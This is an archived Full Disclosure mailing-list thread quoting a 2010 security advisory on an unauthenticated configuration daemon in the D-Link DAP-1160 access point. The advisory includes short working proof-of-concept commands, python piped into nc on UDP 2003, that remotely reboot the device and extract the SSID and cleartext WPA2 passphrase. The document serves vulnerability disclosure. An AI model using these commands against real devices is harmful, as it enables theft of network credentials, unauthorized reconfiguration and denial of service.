Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
From: Cristofaro Mune <pulsoid () icysilence org>
Date: Mon, 28 Jun 2010 17:28:33 +0200

Being the D-Link DAP-1160 an Access Point and not a router it does not
have a specific WAN interface.
Nonetheless, the UDP 2003 port is open and reachable from all the
available interfaces on this device.

Best Regards,
Cristofaro Mune


Gary Baribault wrote:
Is that UDP 2003 open on the WAN interface as well?

Gary Baribault


On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
Security Advisory







IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote

Configuration















Advisory Information



--------------------



Published:



2010-06-28







Updated:



2010-06-28







Manufacturer: D-Link



Model: DAP-1160



Firmware version: 1.20b06



          1.30b10



          1.31b01















Vulnerability Details



---------------------







Public References:



Not Assigned











Platform:



Successfully tested on D-Link DAP-1160 loaded with firmware

versions:



v120b06, v130b10, v131b01.



Other models and/or firmware versions may be also affected.



Note: Only firmware version major numbers are displayed on the



administration web interface: 1.20, 1.30, 1.31











Background Information:



D-Link DAP-1160 is a wireless access points that allow wireless

clients



connectivity to wired networks.



Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2

supported.











Summary:



Unauthenticated access and modification of several device

parameters,



including Wi-Fi SSID, keys and passphrases is possible.



Unauthenticated remote reboot of the device can be also

performed.











Details:



DCCD is an UDP daemon that listens on port UDP 2003 of the

device, that



is likely used for easy device configuration via the DCC (D-Link

Click



'n Connect) protocol.



By sending properly formatted UDP datagrams to dccd daemon it is



possible to perform security relevant operation without any

previous



authentication.



It is possible to remotely retrieve sensitive wireless

configuration



parameters, such as Wi-Fi SSID, Encryption types, keys and

passphrases,



along with other additional information.



It is also possible to remotely modify such parameters and

configure the



device without any knowledge of the web administration password.



Remote reboot is another operation that an attacker may perform

in an



unauthenticated way, possibly triggering a Denial-of-Service

condition.











POC:



- Remote reboot



python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR>

2003







- Retrieving Wi-Fi SSID



python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o

ssid.txt



-u <IP_ADDR> 2003



cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the



received datagram)







- Retrieving WPA2 PSK



python -c 'print "\x03" + "\x00" * 7 +

"\x23\x27\x00\x00\x24\x27\x00"' |



nc -u -o pass.txt <IP_ADDR> 2003



cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx"

in the



received datagram)











Impacts:



Remote extraction of sensitive information



Modification of existing device configuration



POssible Denial-of-Service











Solutions & Workaround:



Not available















Additional Information



----------------------



Timeline (dd/mm/yy):



17/02/2010: Vulnerability discovered



17/02/2010: No suitable technical/security contact on

Global/Regional



website. No contact available on OSVDB website



18/02/2010: Point of contact requested to customer service



----------- No response -----------



26/05/2010: Partial disclosure at CONFidence 2010



28/06/2010: This advisory











Additional information available at http://www.icysilence.org







_______________________________________________



Full-Disclosure - We believe in it.



Charter: http://lists.grok.org.uk/full-disclosure-charter.html



Hosted and sponsored by Secunia - http://secunia.com/





------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault